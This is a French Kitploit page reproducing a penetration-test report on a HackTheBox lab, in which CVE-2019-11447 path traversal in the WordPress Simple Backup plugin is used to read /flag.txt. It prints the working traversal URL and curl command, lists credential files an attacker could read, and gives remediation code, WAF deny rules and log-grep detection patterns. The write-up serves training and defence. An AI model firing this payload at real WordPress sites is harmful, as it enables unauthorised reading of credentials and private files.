Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WordPress-Path-Traversal-CVE-2019-11447 — Rapport détaillé de test d'intrusion démontrant un contournement de chemin non authentifié (CVE-2019-11447) dans le plugin WordPress Simple Backup, incluant les étapes d'exploitation, l'analyse d'impact et les recommandations de remédiation. | Kitploit
Outils/GitHubGitHub/capivara-research/wordpress-path-traversal-cve-2019-11447
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubcapivara-research/wordpress-path-traversal-cve-2019-11447

WordPress-Path-Traversal-CVE-2019-11447

Rapport détaillé de test d'intrusion démontrant un contournement de chemin non authentifié (CVE-2019-11447) dans le plugin WordPress Simple Backup, incluant les étapes d'exploitation, l'analyse d'impact et les recommandations de remédiation.

Voir le dépôt
il y a 2 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rapport de test d'intrusion

Traversée de chemin WordPress - CVE-2019-11447


Informations sur le document

ÉlémentDétails
Titre du documentRapport de test d'intrusion - Traversée de chemin WordPress
Client/ExamenHackTheBox Lab - Exercice CPTS 1
Date22 août 2026
ÉvaluateurCyberia (Testeur d'intrusion)
Type d'évaluationGray Box (externe, sans identifiants)
Environnement de laboratoire154.57.164.73:30706
Durée du laboratoire1 heure
ObjectifsIdentifier et exploiter des vulnérabilités pour récupérer des fichiers restreints
Flag obtenuHTB{my_f1r57_h4ck}

Résumé exécutif

Au cours de cette évaluation d'intrusion de l'application web hébergée sur 154.57.164.73:30706, une vulnérabilité critique a été identifiée qui permet à des attaquants non authentifiés de télécharger et de lire des fichiers arbitraires depuis le système de fichiers du serveur.

L'installation WordPress vulnérable contient un plugin obsolète (Simple Backup v2.7.10) présentant une vulnérabilité de traversée de chemin (CVE-2019-11447) qui permet un accès non autorisé aux fichiers sans nécessiter d'authentification ou d'autorisation.

Cette vulnérabilité a été exploitée avec succès pour récupérer le fichier /flag.txt à la racine du serveur, confirmant une compromission totale de la confidentialité. Un attaquant disposant de cet accès pourrait :

  • Extraire des fichiers de configuration sensibles (wp-config.php, .env)
  • Lire les identifiants de base de données et les données utilisateur
  • Accéder aux clés SSH privées et aux jetons d'authentification
  • Potentiellement élever ses privilèges grâce aux identifiants divulgués
  • Récolter des informations personnelles pour des attaques ultérieures

Une action critique est requise pour remédier immédiatement à cette vulnérabilité, car elle représente un risque extrême pour la sécurité des données, la conformité en matière de confidentialité (RGPD, HIPAA, PCI-DSS) et l'intégrité du système.


Aperçu de l'évaluation

SévéritéNombreImpact métier
🔴 CRITIQUE1Atteinte totale à la confidentialité ; accès non autorisé aux fichiers
🟠 HAUTE0—
🟡 MOYENNE0—
🟢 BASSE0—
ℹ️ INFORMATIF1Versions logicielles obsolètes détectées

Méthodologie

Type d'évaluation : Gray Box (attaquant externe, aucun identifiant fourni, accès réseau disponible)

Dates de l'évaluation : 22 août 2026

Approche de test : Évaluation méthodique et non évasive suivant le cadre standard de test d'intrusion (PTES) :

  1. Reconnaissance — Collecte passive d'informations
  2. Scan et énumération — Découverte active de services
  3. Analyse des vulnérabilités — Identification des faiblesses
  4. Exploitation — Développement d'une preuve de concept
  5. Post-exploitation — Démonstration de l'impact
  6. Rapport — Documentation et recommandations de remédiation

Constatations

🔴 CRITIQUE - Traversée de chemin et téléchargement arbitraire de fichiers

CVE-2019-11447 | CWE-22 : Limitation incorrecte d'un nom de chemin à un répertoire restreint


Description

Le plugin WordPress Simple Backup (version 2.7.10/2.7.11, Exploit-DB 39883) contient une vulnérabilité de traversée de chemin dans sa page d'administration « Backup Manager ». Le plugin ne parvient pas à assainir le chemin de fichier fourni via le paramètre GET download_backup_file, permettant à un attaquant de sortir du répertoire prévu simple-backup/ en utilisant des séquences de chemin relatives (../) et de télécharger tout fichier lisible par le processus du serveur web — y compris les fichiers à la racine du système de fichiers.

Le point de terminaison vulnérable :``` GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt

root@kitploit:~
`page=backup_manager` achemine la requête vers le gestionnaire de page d'administration du plugin ; `download_backup_file` est le paramètre que le code du plugin lit directement et concatène dans un chemin de système de fichiers sans validation, permettant une traversée de répertoire.

---

### Score CVSS v3.1

**7.5 - ÉLEVÉ** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

- **Vecteur d'attaque (AV) :** Réseau
- **Complexité d'attaque (AC) :** Faible
- **Privilèges requis (PR) :** Aucun
- **Interaction utilisateur (UI) :** Aucune
- **Périmètre (S) :** Inchangé
- **Confidentialité (C) :** Élevée
- **Intégrité (I) :** Aucune
- **Disponibilité (A) :** Aucune

---

### Impact métier

**Violation de confidentialité :** ⚠️ CRITIQUE

Les attaquants peuvent lire tout fichier accessible au serveur web, notamment :

| Fichier | Impact | Niveau de risque |
|------|--------|------------|
| `/wp-config.php` | Identifiants de base de données, sels, clés | 🔴 CRITIQUE |
| `/.env` | Clés API, secrets, configuration | 🔴 CRITIQUE |
| `/etc/passwd` | Énumération d'utilisateurs, cartographie du système | 🟠 ÉLEVÉ |
| Clés SSH (`.ssh/id_rsa`) | Mouvement latéral, accès au système | 🔴 CRITIQUE |
| `/proc/self/environ` | Secrets de l'application en cours d'exécution | 🟠 ÉLEVÉ |
| Répertoire de téléversements des utilisateurs | Fichiers privés, médias | 🟠 ÉLEVÉ |

**Impact réglementaire :**
- **Violation du RGPD :** Accès non autorisé aux données utilisateur
- **Violation de la HIPAA :** Exposition d'informations de santé protégées
- **Violation de la PCI-DSS :** Accès aux données de cartes bancaires ou aux informations de paiement
- **Violation de la SOC 2 :** Non-respect de l'exigence de confidentialité

---

### Modèle de code vulnérable

L'avis Exploit-DB (39883.txt, lu via `searchsploit -x` — voir [ht4-poc.png](https://github.com/capivara-research/wordpress-path-traversal-cve-2019-11447/blob/HEAD/images/ht4-poc.png)) documente la primitive **delete** du plugin dans `simple-backup-manager.php` :```php
if(array_key_exists('delete_backup_file', $_GET)){
    $this->delete_local_backup_file($_GET['delete_backup_file']);
}

[No content provided after INPUT:]```php $bk_dir = ABSPATH."simple-backup/"; unlink($bk_dir . $filename);

root@kitploit:~
`$filename` provient directement de `$_GET['delete_backup_file']` sans vérification `basename()` ni contrôle de confinement de chemin. Passer `../pizza.txt` résout `$bk_dir . $filename` en `.../simple-backup/../pizza.txt` → `.../pizza.txt`, ce qui permet de sortir du dossier de sauvegarde prévu.

La primitive de **téléchargement** réellement exploitée lors de cet engagement (`download_backup_file`) suit exactement le même schéma de concaténation non assainie dans le même plugin, mais renvoie le fichier au demandeur au lieu de le supprimer — c'est ce qui a permis de récupérer `/flag.txt` à la racine du système de fichiers (10× `../` depuis `ABSPATH/simple-backup/`).

**Le problème :**
- Aucune utilisation de `basename()` pour supprimer les composants de répertoire
- Aucune liste blanche des fichiers autorisés
- Aucune validation que `realpath()` reste dans `ABSPATH."simple-backup/"`
- Concaténation directe de l'entrée utilisateur dans le chemin du fichier
- Aucun contrôle `current_user_can()` / d'authentification avant de servir le fichier — le gestionnaire s'exécute au chargement du plugin, avant la passerelle d'authentification `wp-admin` de WordPress, il est donc accessible **sans être connecté**

---

### Preuve de concept

#### **Phase 1 : Accès initial — Identification de l'application**

Connexion directe à la cible via le navigateur (`http://154.57.164.73:30706/`). L'installation WordPress est intitulée **« GETTING STARTED »**, et un article de blog public sur la page d'accueil divulgue le nom et la version exacts du plugin en texte clair : **« Simple Backup Plugin 2.7.10 for WordPress »** — aucun outil d'énumération n'était même nécessaire pour identifier le composant vulnérable.

![Accès initial - Version du plugin révélée sur la page d'accueil WordPress](https://assets.kitploit.com/production/public/readmes/51282/807a6be937aeb55de6f3c60b479762729a056e9134edd0f8bf3a0779b36b854f/46c8a8c16d715251f282bacf2522c3e620864b14008847867c32672ba0d051fd-display-v1.webp)

#### **Phase 2 : Identification du service**```bash
whatweb http://154.57.164.73:30706/

Résultat : Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 confirmés via les signatures de plugins MetaGenerator et WordPress.

Empreinte de service - sortie whatweb

Phase 3 : Recherche de vulnérabilités```bash

searchsploit simple backup wordpress

root@kitploit:~
**Résultat :**```
Exploit Title                                              |  Path
------------------------------------------------------------------------------
WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities | php/webapps/39883.txt

Vulnerability Research - searchsploit match

Lecture de l'avis complet pour comprendre les paramètres vulnérables exacts et le chemin de code :```bash searchsploit -x php/webapps/39883.txt

root@kitploit:~
L'avis documente la **suppression arbitraire de fichiers** non authentifiée via le paramètre `delete_backup_file`, et note que les fichiers de sauvegarde sous `simple-backup/` (et, par le même chemin de code non assaini, des fichiers arbitraires via `download_backup_file`) peuvent être récupérés sans authentification.

![Recherche de vulnérabilités - Exploit-DB PoC 39883.txt lu via searchsploit -x](https://assets.kitploit.com/production/public/readmes/51282/8d2f7a41935c4f9ebf4df1243ee68ba0628592b26411770696534eaa903851c4/7e636497c5d9d7382c9b0d7d5917938a399cf76f014b6e5fb754400078325e54-display-v1.webp)

#### **Phase 4 : Exploitation — Traversée de chemin via `download_backup_file`**

Point de terminaison vulnérable identifié à partir du routage de la page d'administration du plugin :```
http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=

Exploitation payload (10× ../ pour remonter de ABSPATH/simple-backup/ jusqu'à la racine du système de fichiers) :``` http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt

root@kitploit:~
**GUI (utilisé dans cette évaluation) :** l’URL du payload a été ouverte directement dans la barre d’adresse du navigateur. Aucune connexion n’était requise — le navigateur a déclenché un téléchargement automatique du fichier `flag.txt` résolu.

![Exploitation - Payload de traversée de chemin dans la barre d’adresse du navigateur, flag.txt téléchargé](https://assets.kitploit.com/production/public/readmes/51282/c02c8273770253f4f0c3b79c0e4de1ab7b8190bfdbbec554a90a25e22553a635/6d1a521bdea2df6ba65e17df783d9f81ea3da096daba3f9bde02bece60a8e406-display-v1.webp)

**Équivalent sans interface graphique :**```bash
curl -s "http://154.57.164.73:30706/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt" -o flag.txt
cat flag.txt

Drapeau obtenu : HTB{my_f1r57_h4ck}


Pourquoi cela fonctionne

La vulnérabilité réussit parce que :

  1. Aucune validation des entrées : $_GET['download_backup_file'] n'est pas vérifié par rapport à une liste blanche
  2. Aucune canonicalisation des chemins : realpath() n'est pas utilisé pour vérifier que le fichier reste dans simple-backup/
  3. Aucune extraction du nom de base : Les séquences de traversée de répertoire (../) ne sont pas filtrées
  4. Concaténation directe : L'entrée utilisateur est directement concaténée à ABSPATH."simple-backup/"
  5. Aucune authentification : Le gestionnaire s'exécute au chargement du plugin, avant la passerelle d'authentification wp-admin de WordPress — accessible même déconnecté
  6. Aucune autorisation : Aucune vérification current_user_can() ne confirme que le demandeur est autorisé à accéder au fichier demandé

Déroulement de l'attaque :``` User Input: ../../../../../../../../../../flag.txt ↓ No Validation (FAILURE POINT) ↓ Concatenated: ABSPATH/simple-backup/../../../../../../../../../../flag.txt ↓ Resolves to: /flag.txt (accessible!) ↓ Plugin serves file contents with web server permissions ↓ Browser downloads flag.txt to attacker's machine

root@kitploit:~
---

### Validation de l'impact

✅ **Confidentialité compromise :** Tout fichier lisible par le processus du serveur web est accessible
✅ **Aucune authentification requise :** Les utilisateurs non authentifiés peuvent exploiter la faille
✅ **Aucune interaction utilisateur nécessaire :** Exploitation directe via une requête HTTP
✅ **Répétable et fiable :** Fonctionne sur toutes les versions vulnérables
✅ **Données métier critiques exposées :** Fichiers de configuration, identifiants, données utilisateur divulgués

---

## Remédiation

### **Option 1 : Liste blanche des entrées (recommandé)**

Autoriser uniquement les téléchargements depuis une liste prédéfinie de fichiers :```php
<?php
// Define allowed backup files
$allowed_files = array(
    'backup_2024_01_15.zip',
    'backup_2024_01_16.zip',
    'backup_2024_01_17.zip',
);

$requested_file = $_GET['download_backup_file'];

// Validate against whitelist
if (!in_array($requested_file, $allowed_files)) {
    die("File not found or access denied");
}

// Use basename() as double protection
$file = basename($requested_file);
$filepath = ABSPATH . "simple-backup/" . $file;

// Verify file exists and is readable
if (!file_exists($filepath) || !is_readable($filepath)) {
    die("File not found");
}

readfile($filepath);
?>

Avantages :

  • Approche la plus sécurisée
  • Autorise uniquement les fichiers prévus
  • Aucune traversée possible
  • Piste d'audit claire

Option 2 : Validation du chemin avec realpath()

Utilisez realpath() pour canoniser les chemins et vérifier le confinement :```php

root@kitploit:~
**Avantages :**
- Gère les liens symboliques et les chemins complexes
- Vérifie le confinement automatiquement
- Plus flexible qu'une liste blanche

---

### **Option 3 : Utiliser basename() pour le nom de fichier uniquement**

Extraire uniquement le composant du nom de fichier :```php
<?php
$user_input = $_GET['download_backup_file'];

// Remove all directory components
$file = basename($user_input);

// Build safe path
$filepath = ABSPATH . "simple-backup/" . $file;

// Verify file exists
if (!file_exists($filepath)) {
    die("File not found");
}

readfile($filepath);
?>

Avantages :

  • Implémentation simple
  • Supprime toutes les séquences de traversée de chemin
  • Aucun accès aux répertoires possible

Remarque : Cette approche ne fonctionne que si tous les fichiers légitimes se trouvent dans un seul répertoire sans sous-répertoires.


Protections au niveau de l'infrastructure

Règles de pare-feu d'application web (WAF) :```

Block path traversal attempts

ModSecurity Rule: SecRule ARGS:download_backup_file "@rx ../" "id:1000,phase:2,block,msg:'Path Traversal Attempt'" SecRule ARGS:download_backup_file "@rx %2e%2e%2f" "id:1001,phase:2,block,msg:'Encoded Path Traversal'"

root@kitploit:~
**Autorisations du système de fichiers :**```bash
# Restrict web server access to necessary directories only
chmod 750 /var/www/html/wp-content/plugins/
chmod 750 /var/www/html/wp-content/simple-backup/

# Remove sensitive files from web root
rm -f /var/www/html/.env
mv /var/www/html/wp-config.php /var/www/wp-config.php

# Use chroot/jailing for web server
# Set PHP open_basedir to restrict file access
php_admin_value[open_basedir] = /var/www/html/uploads

Journalisation des accès et surveillance :```bash

Monitor for traversal attempts in web logs

tail -f /var/log/apache2/access.log | grep ".." tail -f /var/log/apache2/access.log | grep "%2e%2e"

Alert on suspicious file access patterns

Integration with SIEM (Splunk, ELK, etc.)

root@kitploit:~
**Gestion des mises à jour :**

1. Désactiver ou supprimer le plugin Simple Backup
2. Installer une solution de sauvegarde approuvée avec audit de sécurité
3. Mettre à jour WordPress vers la dernière version
4. Mettre à jour tous les plugins vers les dernières versions
5. Mettre à jour PHP vers 8.0+ avec les correctifs de sécurité

---

## Chaîne d'attaque```
┌─────────────────────────────────────────────────────────────┐
│  1. INITIAL ACCESS                                          │
│  └─ Browse to 154.57.164.73:30706                           │
│  └─ WordPress "GETTING STARTED" site identified              │
│  └─ Homepage blog post discloses: Simple Backup Plugin 2.7.10│
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  2. ENUMERATION                                             │
│  └─ whatweb confirms Apache 2.4.41, WordPress 5.6.1          │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  3. VULNERABILITY RESEARCH                                  │
│  └─ searchsploit → 39883.txt (Simple Backup 2.7.11 vulns)    │
│  └─ searchsploit -x → read PoC, identify unsanitized         │
│     delete_backup_file / download_backup_file parameters     │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  4. EXPLOITATION                                             │
│  └─ Endpoint: /wp-admin/tools.php?page=backup_manager        │
│  └─ Payload: download_backup_file=../..(x10)../flag.txt      │
│  └─ Browser navigates to payload URL (no login required)     │
│  └─ Plugin resolves path to /flag.txt and serves it          │
└──────────────────────┬──────────────────────────────────────┘
                       │
┌──────────────────────▼──────────────────────────────────────┐
│  5. SUCCESS                                                 │
│  └─ Flag Retrieved: HTB{my_f1r57_h4ck}                       │
│  └─ Confidentiality Breached                                 │
│  └─ Unauthenticated arbitrary file read confirmed             │
└─────────────────────────────────────────────────────────────┘

Conclusion

Résumé des constatations

Une vulnérabilité critique de traversée de chemin existe dans le plugin WordPress Simple Backup qui permet à des attaquants non authentifiés de télécharger et de lire des fichiers arbitraires depuis le serveur. Cette vulnérabilité a été exploitée avec succès pour récupérer des fichiers sensibles depuis la racine web.

Niveau de risque : 🔴 CRITIQUE

Plan d'action prioritaire

PrioritéActionCalendrierResponsable
🔴 P0Désactiver/Supprimer le plugin Simple BackupImmédiatementSécurité/Ops
🔴 P0Implémenter une validation de fichiers basée sur une liste blancheCette semaineDéveloppement
🟠 P1Déployer des règles WAF pour bloquer la traversée de cheminCette semaineOps
🟠 P1Auditer le serveur pour les journaux d'accès non autorisésCette semaineSécurité
🟠 P1Rotation de toutes les informations d'identification exposées (DB, SSH, API)Cette semaineOps
🟡 P2Mettre à jour le noyau WordPress et tous les pluginsCette semaineOps
🟡 P2Implémenter la surveillance de l'intégrité des fichiersProchain sprintSécurité
🟡 P2Mener un audit de sécurité complet des autres pluginsProchain sprintSécurité

Leçons apprises

  1. Les dépendances de plugins tiers nécessitent un examen minutieux — Toujours auditer les plugins avant le déploiement
  2. La traversée de chemin est une faiblesse critique — La validation des entrées est essentielle
  3. La défense en profondeur est nécessaire — Une sécurité à couche unique est insuffisante
  4. Les logiciels obsolètes présentent un risque élevé — Maintenir des calendriers de mise à jour réguliers
  5. Surveiller et alerter sur les schémas suspects — La détection précoce empêche l'escalade

Captures d'écran et preuves

Capture 1 : Accès initial - Divulgation de la version du plugin

Publication de blog sur la page d'accueil WordPress Constatation : Le site WordPress « GETTING STARTED » divulgue publiquement le plugin installé et sa version dans une publication de blog — « Simple Backup Plugin 2.7.10 for WordPress »

Capture 2 : Empreinte du service - whatweb

Sortie whatweb Constatation : Apache/2.4.41 (Ubuntu Linux), WordPress 5.6.1 confirmé

Capture 3 : Recherche de vulnérabilités - searchsploit

Résultats searchsploit Constatation : « WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities » (php/webapps/39883.txt)

Capture 4 : Recherche de vulnérabilités - Contenu du PoC Exploit-DB

Lecture du PoC searchsploit -x Constatation : L'avis documente la suppression arbitraire de fichiers non authentifiée via delete_backup_file ; le même chemin de code non assaini s'applique à download_backup_file

Capture 5 : Exploitation - Récupération du drapeau via navigateur

Charge utile de traversée de chemin dans le navigateur, flag.txt téléchargé Constatation : La navigation vers tools.php?page=backup_manager&download_backup_file=../../../../../../../../../../flag.txt déclenche un téléchargement non authentifié de flag.txt : HTB{my_f1r57_h4ck}


Références

Détails de la vulnérabilité

  • CVE-2019-11447 — Traversée de chemin Simple Backup

    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11447
  • CWE-22 — Limitation inappropriée d'un nom de chemin à un répertoire restreint (« Traversée de chemin »)

    • https://cwe.mitre.org/data/definitions/22.html
  • Score CVSS v3.1 : 7,5 (Élevé)

    • https://www.first.org/cvss/calculator/3.1

Ressources de sécurité

  • OWASP Top 10 - A01:2021 Contrôle d'accès cassé

    • https://owasp.org/Top10/A01_2021-Broken_Access_Control/
  • OWASP Traversée de chemin

    • https://owasp.org/www-community/attacks/Path_Traversal
  • PortSwigger Web Security Academy - Traversée de chemin

    • https://portswigger.net/web-security/file-path-traversal

Outils et techniques

  • SearchSploit — Recherche dans la base de données d'exploits

    • https://www.exploit-db.com/
  • NMAP — Mappeur de réseau

    • https://nmap.org/
  • WhatWeb — Outil d'empreinte web

    • https://www.morningstarsecurity.com/research/whatweb

Références de remédiation

  • Sécurité PHP : realpath() — https://www.php.net/manual/en/function.realpath.php
  • Sécurité PHP : basename() — https://www.php.net/manual/en/function.basename.php
  • ModSecurity — Pare-feu d'application web — https://modsecurity.org/

Certification du rapport

Ce rapport documente un test d'intrusion mené avec une autorisation appropriée et dans le cadre défini.

ÉlémentValeur
Statut du rapport✅ Terminé
Constatations vérifiées✅ Oui
Recommandations exploitables✅ Oui
Confidentialité🔒 Élevée
DistributionRestreinte au personnel autorisé

Évaluateur : Capivara Root (Testeur d'intrusion)
Date : 11 août 2026
Signature : Rapport numérique - Aucune signature physique requise


© 2026 Évaluation de test d'intrusion | Confidentiel

Télécharger l’outil